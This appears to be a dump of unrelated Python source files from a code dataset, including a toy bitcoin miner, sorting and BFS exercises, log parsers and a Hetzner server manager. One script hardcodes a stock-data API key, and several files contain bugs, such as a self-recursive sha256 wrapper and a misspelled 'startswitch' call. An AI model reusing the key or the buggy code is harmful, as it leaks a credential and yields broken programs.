configuration[\"output\"].close()\nconfiguration[\"concurrency\"].terminate()\n","sub_path":"mpi_params.py","file_name":"mpi_params.py","file_ext":"py","file_size_in_byte":4349,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"104523640","text":"col1 = open('col1.txt')\ncol2 = open('col2.txt')\nf = open('col1col2.txt', 'w')\n\n# zip is useful to use some sequence object!\nfor (c1, c2) in zip(col1, col2):\n c1 = c1.replace(\"\\n\", \"\")\n c2 = c2.replace(\"\\n\", \"\")\n f.write(\"%s\\t%s\\n\" % (c1,c2))\n\ncol1.close()\ncol2.close()\nf.close()\n \n","sub_path":"NLP100/chapter02/solve13.py","file_name":"solve13.py","file_ext":"py","file_size_in_byte":293,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"443562621","text":"from chronos.utils import datetime\nfrom datetime import timedelta\n\nclass Event(object):\n \"\"\"An internal representation of an event.\"\"\"\n\n def __init__(self, uid, title='', description='', start=None, end=None,\n location=None, calendar_uid='', color=None, active=True):\n\n self.uid = uid\n self.title = title\n self.description = description\n self.start = start\n self.end = end\n self.location = location\n self.calendar_uid = calendar_uid\n self.color = color\n self.active = active\n\n if isinstance(start, (float, int)):\n self.start = datetime.fromtimestamp(start)\n if isinstance(end, (float, int)):\n self.end = datetime.fromtimestamp(end)\n\n if (self.end.day - self.start.day == 1 and self.end.hour == 0 and\n self.end.minute == 0 and self.end.second == 0):\n # This is a single day event but actually spawns over 2 days\n prev = self.end - timedelta(seconds=1)\n self.end = datetime.from_datetime(prev)\n\n def __eq__(self, other):\n\n if (self.uid == other.uid and\n self.title == other.title and\n self.description == other.description and\n self.start == other.start and\n self.end == other.end and\n self.location == other.location and\n self.calendar_uid == other.calendar_uid and\n self.active == other.active):\n return True\n else:\n return False\n\n\n def __ne__(self, other):\n return not self.__eq__(other)\n\n\n def __repr__(self):\n return ''.format(self.title)\n","sub_path":"src/chronos/event.py","file_name":"event.py","file_ext":"py","file_size_in_byte":1660,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"79554386","text":"# Sentence Reversal\n\n'''\nGiven a string of words, reverse all the words. For example:\n\nGiven:\n'This is the best'\n\nReturn:\n'best the is This'\n\nAs part of this exercise you should remove all leading and trailing whitespace. So that inputs such as:\n' space here' and 'space here '\nboth become:\n'here space'\n'''\n\n\ndef rev_word(s):\n s = s.split(' ')\n s.reverse()\n rev = ' '.join([word for word in s if word != ''])\n return rev\n\n\nprint(rev_word('Hi John, are you ready to go?'))\nprint(rev_word(' space before'))\n\n\ndef rev_word2(s):\n length = len(s)\n words = []\n\n for i in range(length):\n if s[i] != ' ':\n word_start = i\n while i < length and s[i] != ' ':\n i += 1\n words.append(words[word_start:i])\n i += 1\n words = ' '.join(reversed(words))\n return words\n\n\nprint(rev_word('Hi John, are you ready to go?'))\nprint(rev_word(' space before'))","sub_path":"data structures/01 Array Sequences/05sentence_reversal.py","file_name":"05sentence_reversal.py","file_ext":"py","file_size_in_byte":938,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"204454112","text":"if(__name__ == \"__main__\"):\n\tn, p = [int(tmp) for tmp in raw_input().split(' ')]\n\tl = []\n\tfor i in range(n):\n\t\tl.append(raw_input() == \"half\")\n\tif(l[-1]):\n\t\tans, buy = 2, 1\n\telse:\n\t\tans, buy = 1, 0.5\n\tfor i in range(n - 2, -1, -1):\n\t\tif(l[i]):\n\t\t\tbuy += ans\n\t\t\tans = ans * 2\n\t\telse:\n\t\t\tbuy += ans + 0.5\n\t\t\tans = ans * 2 + 1\n\tprint(int(buy * p))","sub_path":"online_judge/codeforces/632, Educational Codeforces Round 9/A. Grandma Laura and Apples.py","file_name":"A. Grandma Laura and Apples.py","file_ext":"py","file_size_in_byte":344,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"179585914","text":"from hashlib import sha256\nMAX_NONCE =100000000\n\ndef sha256(text):\n return sha256(text.encode('ascii')).hexdigest()\n\ndef mine(block_number,transactions,previous_hash,prefix_zeros):\n prefix_str = '0'*prefix_zeros\n for nonce in range(MAX_NONCE):\n text = str(block_number) + transactions + previous_hash + str(nonce)\n new_hash = sha256(text)\n if new_hash.startswitch(prefix_str):\n print(f\"yay! Sucessfully mined bitcoins with bitcoins with nonce value :{nonce}\")\n return new_hash\n \n raise BaseException(\"Couldn't find correct has after trying {MAX_NONCE} times\")\n\nif __name__ =='__main__':\n transactions = '''\n dhaval->bhavin->20,\n mando->cara->45\n '''\n difficulty = 4\n import time\n start = time.time()\n print(\"start mining\")\n new_hash = mine(5 , transactions , '00000000839a8e6886ab5951d76f411475428afc90947ee320161bbf18eb6048' , difficulty)\n total_time = str((time.time() - start))\n print(f\"end mining. Mining took : {total_time} seconds\")\n print(new_hash)","sub_path":"BitcoinMining.py","file_name":"BitcoinMining.py","file_ext":"py","file_size_in_byte":1049,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"297219164","text":"# RADIX SORT ALGORITHM\n# Descrizione: https://www.thelicato.it/blog/algoritmi-di-ordinamento-radix-sort-in-python/\n\nimport sys\nfrom utils import *\n\ndef counting_sort_radix(A,cifra):\n array=A[:] #creo una copia del vettore da ordinare\n\n C=[0 for i in range(10)]\n\n for element in array:\n C[element//10**(cifra-1)%10]+=1\n\n for i in range(1,10):\n C[i]=C[i]+C[i-1]\n \n for j in range(len(array)-1,-1,-1):\n A[C[array[j]//10**(cifra-1)%10]-1]=array[j]\n C[array[j]//10**(cifra-1)%10]-=1\n\ndef radix_sort(array,num_cifre):\n for cifra in range(1,num_cifre+1):\n counting_sort_radix(array,cifra)\n","sub_path":"radix_sort.py","file_name":"radix_sort.py","file_ext":"py","file_size_in_byte":638,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"365919643","text":"import random\r\n\r\n\r\ndef main():\r\n text_list = []\r\n\r\n with open('rt-polaritydata/rt-polarity.neg', 'r', encoding='latin-1') as f:\r\n for line in f:\r\n text_list.append('-1\\t{}'.format(line))\r\n\r\n with open('rt-polaritydata/rt-polarity.pos', 'r', encoding='latin-1') as f:\r\n for line in f:\r\n text_list.append('+1\\t{}'.format(line))\r\n\r\n random.shuffle(text_list)\r\n\r\n with open('sentiment.txt', 'w', encoding='latin-1') as f:\r\n f.write(''.join(text_list))\r\n\r\n pos = 0\r\n neg = 0\r\n with open('sentiment.txt', 'r', encoding='latin-1') as f:\r\n for line in f:\r\n line = line.split('\\t')[0]\r\n if line == '+1':\r\n pos += 1\r\n else:\r\n neg += 1\r\n\r\n print(f'pos {pos}, neg {neg}')\r\n\r\n\r\nif __name__ == '__main__':\r\n main()\r\n","sub_path":"hwichan/chapter08/knock70.py","file_name":"knock70.py","file_ext":"py","file_size_in_byte":845,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"177658112","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport sys\nsys.path.append('..')\nsys.path.insert(0, 'input')\nsys.path.insert(0, 'clustering')\nsys.path.insert(0, 'output')\n\nimport input.writingWavAndPng as input\nimport clustering.templateMatching as tm\nimport output.test_out as output\n\nif __name__ == '__main__':\n fname = input.recordingAndWriting()\n im = tm.ImageMatching()\n classfilename = im.run(fname)\n classfilename = '../clustering/' + classfilename\n output.output(classfilename)\n","sub_path":"main/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":500,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"481902090","text":"#\n# @lc app=leetcode.cn id=36 lang=python3\n#\n# [36] 有效的数独\n#\n\n# @lc code=start\nclass Solution:\n from collections import defaultdict\n def isValidSudoku(self, board: List[List[str]]) -> bool:\n row, col, box = defaultdict(set), defaultdict(set), defaultdict(set)\n for i in range(9):\n for j in range(9):\n if board[i][j] != '.':\n if board[i][j] not in row[i]:\n row[i].add(board[i][j])\n else:\n return False\n if board[i][j] not in col[j]:\n col[j].add(board[i][j])\n else:\n return False\n if board[i][j] not in box[(i // 3, j // 3)]:\n box[(i // 3, j // 3)].add(board[i][j])\n else:\n return False\n return True\n# @lc code=end\n","sub_path":"Week07/36.有效的数独.py","file_name":"36.有效的数独.py","file_ext":"py","file_size_in_byte":927,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"619893631","text":"#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri May 3 11:29:42 2019\n\n@author: rdamseh\n\"\"\"\n\n\nimport sys\n\n# add VascGraph package to python path\ntry:\n sys.path.append('/home/rdamseh/GraphPaper2018V1/')\nexcept: pass\n\nimport os\nimport subprocess\nfrom VascGraph.GraphIO import WriteSWC, ReadSWC\n\n\n\nclass ValidateDiadem:\n \n '''\n Get diadem score from true and exp SWC tree files\n \n '''\n \n def __init__(self, true_graphs=None, exp_graphs=None, D=1, X=1, \n R=1, Z=1, zpath=True,\n m=False):\n \n \n if type(true_graphs)!=list:\n self.true_graphs=[true_graphs]\n else:\n self.true_graphs=true_graphs\n \n if type(exp_graphs)!=list:\n self.exp_graphs=[exp_graphs]\n else:\n self.exp_graphs=exp_graphs\n \n self.scores=[]\n \n self.directory=os.path.dirname(os.path.realpath(__file__))\n self.D=D\n self.X=X\n self.R=R\n self.Z=Z\n \n if zpath:\n self.zpath='true'\n else:\n self.zpath='false'\n \n if m:\n self.m='true'\n else:\n self.m='false'\n \n def __GetSingleScore(self, true_graph, exp_graph):\n \n \n WriteSWC(path=self.directory+'/', name='true.swc', tree_graph=true_graph, root=0) # wirte true tree\n WriteSWC(path=self.directory+'/', name='exp.swc', tree_graph=exp_graph, root=0) # wirte exp tree\n \n true=self.directory+'/true.swc'\n test=self.directory+'/exp.swc'\n \n command=['java', '-jar', self.directory+'/DiademMetric.jar', \n '-G', true, \n '-T', test, \n '-m', self.m, \n '-D', str(self.D),\n '-x', str(self.X),\n '-R', str(self.R),\n '--z-threshold', str(self.Z), \n '--z-path', self.zpath,\n '-w','1']\n try:\n self.scores.append(subprocess.check_output(command).split()[1])\n except:\n self.scores.append(subprocess.check_output(command))\n\n \n def GetScores(self):\n\n for i, j in zip(self.true_graphs, self.exp_graphs):\n \n self.__GetSingleScore(i, j)\n \n return self.scores\n\n\n\nif __name__==\"__main__\":\n \n \n \n \n path='/home/rdamseh/GraphPaper2018V1/validation/mra/trees/'\n truefile='truetree2.swc' \n testfile='mytree2.swc'\n \n \n true_graph=ReadSWC(path+truefile).GetOutput()\n exp_graph=ReadSWC(path+testfile).GetOutput()\n \n \n diadem=ValidateDiadem([true_graph, true_graph], [exp_graph, exp_graph])\n s=diadem.GetScores()\n \n \n \n ","sub_path":"build/lib/VascGraph/GraphValidation/ValidateDiadem.py","file_name":"ValidateDiadem.py","file_ext":"py","file_size_in_byte":2816,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"123904739","text":"import argparse\nparse_desc = \"\"\"Convert gridded 1 min GLM imagery produced by\nglmtools to a zarr store, rechunking to smaller tiles across a longer time\ninterval.\n\nRequires glmtools and dask\n\"\"\"\n\ndef create_parser():\n parser = argparse.ArgumentParser(description=parse_desc)\n parser.add_argument(dest='filenames',metavar='filename', nargs='*')\n parser.add_argument('-o', '--output_path',\n metavar='filename for the output zarr store',\n required=True, dest='zarr_out', action='store')\n parser.add_argument('-m', '--temp_zarr_path',\n metavar='filename template including path',\n required=False, dest='zarr_temp', action='store',\n default='./_glm_store_temp.zarr')\n parser.add_argument('-x', '--x_chunks',\n metavar='number of x gridpoints per chunk',\n required=False, dest='x_chunks', action='store',\n default=678, type=int)\n parser.add_argument('-y', '--y_chunks',\n metavar='number of y gridpoints per chunk',\n required=False, dest='y_chunks', action='store',\n default=678, type=int)\n parser.add_argument('-t', '--t_chunks',\n metavar='number of time intervals per chunk',\n required=False, dest='t_chunks', action='store',\n default=60, type=int)\n parser.add_argument('--dask_workers',\n metavar='number of dask workers',\n required=False, dest='dask_workers', action='store',\n default=1, type=int)\n parser.add_argument('--dask_threads',\n metavar='number of threads per dask worker',\n required=False, dest='dask_threads', action='store',\n default=2, type=int)\n\n return parser\n\nimport os\nfrom glmtools.io.imagery import open_glm_time_series\n\nif __name__ == '__main__':\n\n parser = create_parser()\n args = parser.parse_args()\n\n from dask.distributed import Client\n dask_client=Client(n_workers=args.dask_workers, threads_per_worker=args.dask_threads)\n print(dask_client)\n # from chunks import rechunker_wrapper\n import numpy as np\n\n\n rechunk_spec = {'x':args.x_chunks, 'y':args.y_chunks, 'time':args.t_chunks}\n\n\n filenames = args.filenames\n zarr_store = args.zarr_out\n temp_zarr_store = args.zarr_temp\n filenames.sort()\n n_files = len(filenames)\n\n n_time_chunks = int(np.ceil(n_files/rechunk_spec['time']))\n for i in range(n_time_chunks):\n these_files = slice(i*rechunk_spec['time'],\n int(np.min([(i+1)*rechunk_spec['time'], n_files])))\n\n\n print(\"Reading GLM for time chunk {0}/{1}\".format(i+1,n_time_chunks))\n ltg_ds_nc = open_glm_time_series(filenames[these_files]\n ).sortby('time').chunk(chunks=rechunk_spec)\n n_times = ltg_ds_nc.dims['time']\n print(\"Converting {0} GLM times\".format(n_times))\n\n\n# 64x64 spatial tiles are 165 Mpixels per variable\n# In [85]: 64*64*(24*60)*30/(1024**3)\n# Out[85]: 0.164794921875\n if os.path.exists(zarr_store):\n ltg_ds_nc.to_zarr(zarr_store, consolidated=True, append_dim='time')\n else:\n ltg_ds_nc.to_zarr(zarr_store, consolidated=True, mode='w')\n # Cannot run this with Distributed client - get error\n # distributed.utils_perf - WARNING - full garbage collections took 10% CPU time recently\n# rechunker_wrapper(ltg_ds_nc, zarr_store, temp_zarr_store, chunks=rechunk_spec, consolidated=True)\n# Replaced by above\n# ltg_ds_nc.chunk(rechunk_spec).to_zarr(zarr_store)\n# ltg_ds_nc.close()\n","sub_path":"scripts/glml2_to_zarr.py","file_name":"glml2_to_zarr.py","file_ext":"py","file_size_in_byte":3817,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"388667071","text":"# -*- coding: utf-8 -*-\r\nimport numpy as np\r\nimport tensorflow as tf\r\nimport matplotlib.pyplot as plt\r\nfrom tensorflow.examples.tutorials.mnist import input_data\r\n\r\n#载入数据\r\nprint(\"from mnist-data/ load data begin \")\r\nmnist = input_data.read_data_sets('mnist-data/', one_hot=True)\r\nprint(\"mnist-data load success\")\r\n\r\nbatch_size = 100\r\n#n_batch 表示一个周期需要几个batch\r\nn_batch = mnist.train.num_examples //batch_size\r\n\r\nx = tf.placeholder(tf.float32, [None, 784], name = 'x')\r\ny = tf.placeholder(tf.float32, [None, 10], name = 'y')\r\n\r\nW = tf.Variable(tf.zeros([784,10]))\r\nb = tf.Variable(tf.zeros([10]))\r\n\r\nprediction = tf.nn.softmax(tf.matmul(x, W) + b)\r\nloss = tf.reduce_mean(tf.square(y - prediction))\r\n\r\n#学习率\r\nlearningrate = 0.01\r\n\r\n#定义优化器\r\noptimizer = tf.train.GradientDescentOptimizer(learningrate).minimize(loss)\r\n\r\n#计算准确率\r\ncorrect_prediction = tf.equal(tf.argmax(y, 1), tf.argmax(prediction, 1))\r\naccuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))\r\n\r\ninit = tf.global_variables_initializer()\r\n\r\n#tf.device('/gpu:0')\r\nsess = tf.Session()\r\nsess.run(init)\r\n\r\n\r\n#迭代周期次数\r\nepoch_num = 1000\r\nfor epoch in range(epoch_num):\r\n\tfor batch in range(n_batch):\r\n\t\tx_batch,y_batch = mnist.train.next_batch(batch_size)\r\n\t\tsess.run(optimizer,feed_dict={x:x_batch, y:y_batch})\r\n\t\t\r\n\taccu = sess.run(accuracy,feed_dict={x:mnist.test.images, y:mnist.test.labels})\r\n\tif(epoch %5 ==0):\r\n\t\tprint(\"epoch is {0} ,test accuracy = {1}\".format(epoch,accu))\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"03-mnist-LineR.py","file_name":"03-mnist-LineR.py","file_ext":"py","file_size_in_byte":1536,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"77318862","text":"import re\nimport json\nimport time\n\n\ndef del_dups(seq):\n seen = {}\n pos = 0\n for item in seq:\n if item not in seen:\n seen[item] = True\n seq[pos] = item\n pos += 1\n del seq[pos:]\n return seq\n\ndef popula_alertas(sitescope):\n dic_alertas = []\n num_alertas = 0\n\n novo = False\n\n pattern = re.compile(' alert-(.*?): ')\n\n try:\n alertas = open(sitescope + '/alert.log.old', 'r', encoding=\"utf-8\")\n linhas = alertas.readlines()\n except UnicodeDecodeError:\n alertas = open(sitescope + '/alert.log.old', 'r', encoding=\"latin-1\")\n linhas = alertas.readlines()\n\n\n for linha in linhas:\n linha = linha.replace('\\x96', '-')\n if not pattern.match(linha):\n novo = False\n\n if '\\talert\\n' in linha:\n hora = linha.rstrip('\\talert\\n')\n dic_alertas.append({'hora':hora})\n novo = True\n num_alertas += 1\n\n if novo and pattern.match(linha):\n atributo, valor = linha.rstrip('\\n').split(': ')[:2]\n dic_alertas[num_alertas - 1][atributo.lstrip(' ')] = valor.rstrip('\\n')\n\n try:\n alertas = open(sitescope + '/alert.log', 'r', encoding=\"utf-8\")\n linhas = alertas.readlines()\n except UnicodeDecodeError:\n alertas = open(sitescope + '/alert.log', 'r', encoding=\"latin-1\")\n linhas = alertas.readlines()\n\n\n for linha in linhas:\n linha = linha.replace('\\x96', '-')\n if not pattern.match(linha):\n novo = False\n\n if '\\talert\\n' in linha:\n hora = linha.rstrip('\\talert\\n')\n dic_alertas.append({'hora':hora})\n novo = True\n num_alertas += 1\n\n if novo and pattern.match(linha):\n atributo, valor = linha.rstrip('\\n').split(': ')[:2]\n dic_alertas[num_alertas - 1][atributo.lstrip(' ')] = valor.rstrip('\\n')\n\n return dic_alertas\n\ndef gerar_arquivo_alertas(dic_alertas, sitescope):\n with open(sitescope + '/arquivo_alertas.txt', 'w') as saida:\n for alerta in dic_alertas:\n nome_alerta = str(alerta).replace('\\x96', '-')\n saida.write(nome_alerta + '\\n')\n\n\n headers = ''\n with open(sitescope + '/arquivo_alertas_web.txt', 'w') as saida:\n for alerta in dic_alertas[:1]:\n for header in alerta.keys():\n headers += header + ','\n saida.write(headers[:-1]+'\\n')\n\n for alerta in dic_alertas:\n valores = ''\n for valor in alerta.values():\n valores += valor.replace(',', ';') + ','\n saida.write(valores[:-1]+'\\n')\n\n\ndef gerar_arquivo_unicos(dic_alertas, sitescope):\n print(sitescope + '\\t\\tLendo o arquivo (' + str(len(dic_alertas)) + ') entradas...' )\n monitores = []\n for alerta in dic_alertas:\n monitores.append(alerta['alert-monitor'])\n\n\n print(sitescope + '\\t\\tCalculando a quantidade de alertas por monitor (' + str(len(monitores)) + ') alertas...' )\n monitores_quantidade = []\n for nome_alerta in del_dups(monitores):\n monitores_quantidade.append([(get_quantidade_alertas(dic_alertas, nome_alerta)), nome_alerta])\n\n ordenados = sorted(monitores_quantidade, reverse=True)\n\n print (sitescope + '\\t\\tEscrevendo saida (' + str(len(ordenados)) + ') monitores...')\n with open(sitescope + '/monitores.txt', 'w') as arq_monitores:\n for alerta in ordenados:\n nome_alerta = alerta[1].replace('\\x96', '-')\n arq_monitores.write('(' + str(alerta[0]) + ') - ' + nome_alerta + '\\n')\n\ndef obter_alertas_arquivo(sitescope):\n return [json.loads(line.rstrip('\\n').replace(\"'\", \"\\\"\")) for line in open(sitescope + '/arquivo_alertas.txt', 'r')]\n\ndef obter_monitores_arquivo(sitescope):\n return [line.rstrip('\\n') for line in open(sitescope + '/monitores.txt', 'r')]\n\ndef ordenar_monitores(lista_monitores, campo):\n if 'quantidade' in campo.lower():\n return lista_monitores\n\n if 'nome' in campo.lower():\n arqs = []\n for entrada in lista_monitores:\n arqs.append(entrada.split(' - ')[1] + ' - ' + entrada.split(' - ')[0])\n ordenado = []\n for o in sorted(arqs):\n ordenado.append(o.split(' - ')[1] + ' - ' + o.split(' - ')[0])\n\n return ordenado\ndef get_alertas_by(dic_alertas, campo, valor):\n filtrados = []\n for alerta in dic_alertas:\n if valor.lower() in alerta[campo].lower():\n filtrados.append(alerta)\n return filtrados\n\ndef get_quantidade_alertas(dic_alertas, name):\n quantidade = 0\n for alerta in dic_alertas:\n if alerta['alert-monitor'] == name:\n quantidade += 1\n\n return quantidade\n\ndef get_unique_alerts(dic_alertas):\n\n monitores = []\n for alerta in dic_alertas:\n monitores.append(alerta['alert-monitor'])\n\n monitores_quantidade = []\n for nome_alerta in set(monitores):\n monitores_quantidade.append([(get_quantidade_alertas(dic_alertas, nome_alerta)), nome_alerta])\n\n lista_formatada = []\n for alerta in sorted(monitores_quantidade, reverse=True):\n lista_formatada.append('(' + str(alerta[0]) + ') - ' + alerta[1])\n\n return lista_formatada\n\n\nif __name__ == '__main__':\n #obter_alertas_arquivo('sitescope001')\n\n sitescopes = [#'sitescope001',\n #'sitescope002',\n 'sitescope003',\n #'sitescope004',\n ]\n\n for sitescope in sitescopes:\n print('')\n print (sitescope + '\\tProcessando arquivos de log...')\n dic_alertas = popula_alertas(sitescope)\n\n print (sitescope + '\\tFormatando saida...')\n gerar_arquivo_alertas(dic_alertas, sitescope)\n\n print (sitescope + '\\tGerando monitores...')\n gerar_arquivo_unicos(dic_alertas, sitescope)\n\n obter_alertas_arquivo('sitescope003')\n\n\n","sub_path":"web/metricsgraphics/project/alert_viewer.py","file_name":"alert_viewer.py","file_ext":"py","file_size_in_byte":5853,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"45439224","text":"import requests\r\nimport json\r\nfrom api_key import api_key\r\nfrom alpha_vantage.timeseries import TimeSeries\r\n\r\n# This is the library that wraps the API get methods as function calls\r\n\r\nurl = \"https://api.ciscospark.com/v1/\"\r\n# API URL\r\nheaders = {\"Authorization\": \"Bearer \" + api_key}\r\n\r\n\r\n# Standard issue Bearer - Auth\r\n\r\ndef get_room_ids(url, headers):\r\n response = json.loads(requests.get(url + \"rooms\", headers=headers).text)['items']\r\n # Gets the JSON object which is a dict with every room,\r\n # then unpacks it to a dict and assigns the ['items'] key's values to response\r\n roomids = []\r\n # List of room ids to be returned\r\n for i in response:\r\n roomids.append(i['id'])\r\n # Find all room ids and return to a list for use later\r\n return roomids # Return type is list\r\n\r\n\r\ndef get_msft_price():\r\n ts = TimeSeries(key=\"6N6NCHHOY72NXZ4T\", output_format='pandas')\r\n # Initialize session with Alpha Vantage\r\n data, meta_data = ts.get_daily('MSFT')\r\n # Get all daily data for MSFT upto last close\r\n return data.tail(1)['4. close'].iloc[0]\r\n # Traverse the dataframe and get the value for the latest close, by getting the first tail row,\r\n # the close of the price and the price itself\r\n # Return type is float\r\n\r\n\r\ndef get_screener_roomid():\r\n roomids = get_room_ids(url, headers)\r\n # Get room ids, this is a function call to the first function in the lib\r\n needed_id = \"\"\r\n # Declare a variable that will store the id needed to send message to Screener space\r\n for id in roomids:\r\n\r\n response = json.loads(requests.get(url + \"rooms/\" + id, headers=headers).text)\r\n # Get the details of each room in roomids list\r\n if response['title'] == 'Screener':\r\n # if the name of the space is Screener\r\n needed_id = response['id']\r\n # Get the id of the space\r\n return needed_id\r\n # return the id\r\n","sub_path":"webexlib.py","file_name":"webexlib.py","file_ext":"py","file_size_in_byte":1921,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"109869282","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Jun 20 20:44:50 2018\r\n\r\n@author: 王磊\r\n\"\"\"\r\n\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\n\r\ndata = np.random.randint(0, 255, size=[40,40,40])\r\n\r\nx, y, z = data[0], data[1], data[2]\r\nax = plt.subplot(111, projection='3d')\r\nax.scatter(x[:10], y[:10], z[:10], c='y')\r\nax.scatter(x[10:20], y[10:20], z[10:20], c='r')\r\nax.scatter(x[30:40], y[30:40], z[30:40], c='g')\r\n\r\nax.set_zlabel('Z')\r\nax.set_ylabel('Y')\r\nax.set_xlabel('X')\r\n\r\nplt.show()\r\n\r\n\r\n","sub_path":"数据挖掘/三维图学习1.py","file_name":"三维图学习1.py","file_ext":"py","file_size_in_byte":499,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"481177501","text":"import pytest\nfrom stack import Stack\n\n\n@pytest.fixture\ndef stack():\n return Stack()\n\n\ndef test_creating_empty_stack(stack):\n assert stack.count == 0\n\n\ndef test_adding_new_element_to_stack(stack):\n stack.push(3)\n assert stack.count == 1\n\n\ndef test_resize_method(stack):\n stack._Stack__resize(10)\n assert stack.length == 10\n\n\ndef test_removing_an_element(stack):\n stack.push(3)\n stack.push(2)\n stack.pop()\n assert stack.count == 1\n\n\ndef test_removing_an_item_from_empty_stack(stack):\n assert stack.pop() == None\n\n\ndef test_resizing_after_pop(stack):\n stack.push(10)\n stack.push(9)\n stack.push(8)\n stack.push(7)\n stack.push(6)\n stack.push(5)\n stack.push(4)\n stack.push(3)\n\n stack.pop()\n stack.pop()\n stack.pop()\n stack.pop()\n stack.pop()\n stack.pop()\n assert stack.length == 4\n\n\ndef test_iteration(stack):\n stack.push(9)\n stack.push(10)\n stack.push(11)\n elements = []\n for e in stack:\n elements.append(e)\n\n assert elements == [11, 10, 9]\n","sub_path":"google_interview/resizing_array/test_stack.py","file_name":"test_stack.py","file_ext":"py","file_size_in_byte":1039,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"550983527","text":"import statistics as stats\n\nmylist = [1, 2, 3, 4]\n\nx = stats.mean(mylist)\ny = stats.median(mylist)\n# z = stats.mode(mylist)\na = stats.stdev(mylist)\nb = stats.variance(mylist)\nprint(x, y, a, b)\n","sub_path":"maths.py","file_name":"maths.py","file_ext":"py","file_size_in_byte":193,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"280431852","text":"from queues_adt import Queue\r\n\r\n\r\ndef bfs(start, end):\r\n \"\"\"\r\n Breadth first search. Takes a start node and end node, and uses\r\n its neighbour list to traverse the graph.\r\n Uses the LIFO queue in queues.py.\r\n :param start: Node\r\n :param end: Node\r\n :return: previous, dictionary with all nodes, and where we came from\r\n (parent) to this node.\r\n success, True or False. If the algorithm found the end node or not\r\n has_been_next, list of nodes that have been considered as the next node.\r\n \"\"\"\r\n q = Queue()\r\n q.add(start)\r\n previous = {start: None}\r\n success = False\r\n has_been_next = []\r\n\r\n while not q.empty():\r\n currnode = q.pop()\r\n currnode.visit()\r\n if currnode == end:\r\n success = True\r\n break\r\n\r\n for nextnode in currnode.neighbours.keys():\r\n if nextnode not in has_been_next:\r\n has_been_next.append(nextnode)\r\n if nextnode not in previous:\r\n q.add(nextnode)\r\n previous[nextnode] = currnode\r\n\r\n return success, previous, has_been_next\r\n","sub_path":"API/bfs_pf.py","file_name":"bfs_pf.py","file_ext":"py","file_size_in_byte":1141,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"172810241","text":"\nfrom hcloud import Client\n\nfrom hcloud.images.domain import Image\nfrom hcloud.server_types.domain import ServerType\nfrom hcloud.ssh_keys.client import SSHKeysClient\n\nfrom ctrldbops import add_hetzner, get_hetzner\n\nimport configparser\n\nhetzner_config = configparser.ConfigParser()\nhetzner_config.read('/home/bitclouds/bitclouds/controller/config.ini')\n\nhetzner_token = hetzner_config['hetzner']['api_key']\n\nclient = Client(token=hetzner_token) # Please paste your API token here between the quotes\nsshClient = SSHKeysClient(client)\n\n\ndef getServers():\n hetzner_servers = client.servers.get_all()\n\n servers = list()\n\n for server in hetzner_servers:\n serverData = dict()\n\n serverData['id'] = server.id\n serverData['ip'] = server.public_net.ipv4.ip\n serverData['name'] = server.name\n\n servers.append(serverData)\n\n return servers\n\n\ndef createServer(name, image):\n #freebsd = snapid=\"8322744\"\n #image=Image(type=\"snapshot\", id=snapid)\n sysImage = True\n\n if image==\"debian\":\n image_name = \"debian-10\"\n elif image == \"centos\":\n image_name = \"centos-8\"\n elif image == \"freebsd\":\n snap_id = \"8322744\"\n sysImage = False\n elif image == \"vpn\":\n snap_id = \"9207785\"\n sysImage = False\n elif image == \"ubuntu\":\n image_name = \"ubuntu-18.04\"\n\n if sysImage:\n response = client.servers.create(name=name, server_type=ServerType(\"cx11\"), image=Image(name=image_name))\n else:\n response = client.servers.create(name=name, server_type=ServerType(\"cx11\"), image=Image(type=\"snapshot\", id=snap_id))\n\n server = response.server\n\n serverData = dict()\n\n serverData['id'] = server.id\n serverData['ip'] = server.public_net.ipv4.ip\n serverData['pwd'] = response.root_password\n\n add_hetzner(name, server.id, server.public_net.ipv4.ip, \"cx11\", response.root_password)\n\n return serverData\n\n\ndef deleteServer(id):\n\n servers = client.servers.get_all()\n found = False\n for server in servers:\n if server.id == id:\n found = True\n print(str(id) + \" to be deleted from hetzner\")\n server.delete()\n if not found:\n print(str(id) + \" not found or already deleted\")\n\n return True\n","sub_path":"controller/hetzner.py","file_name":"hetzner.py","file_ext":"py","file_size_in_byte":2264,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"46680296","text":"from django.shortcuts import render\nfrom 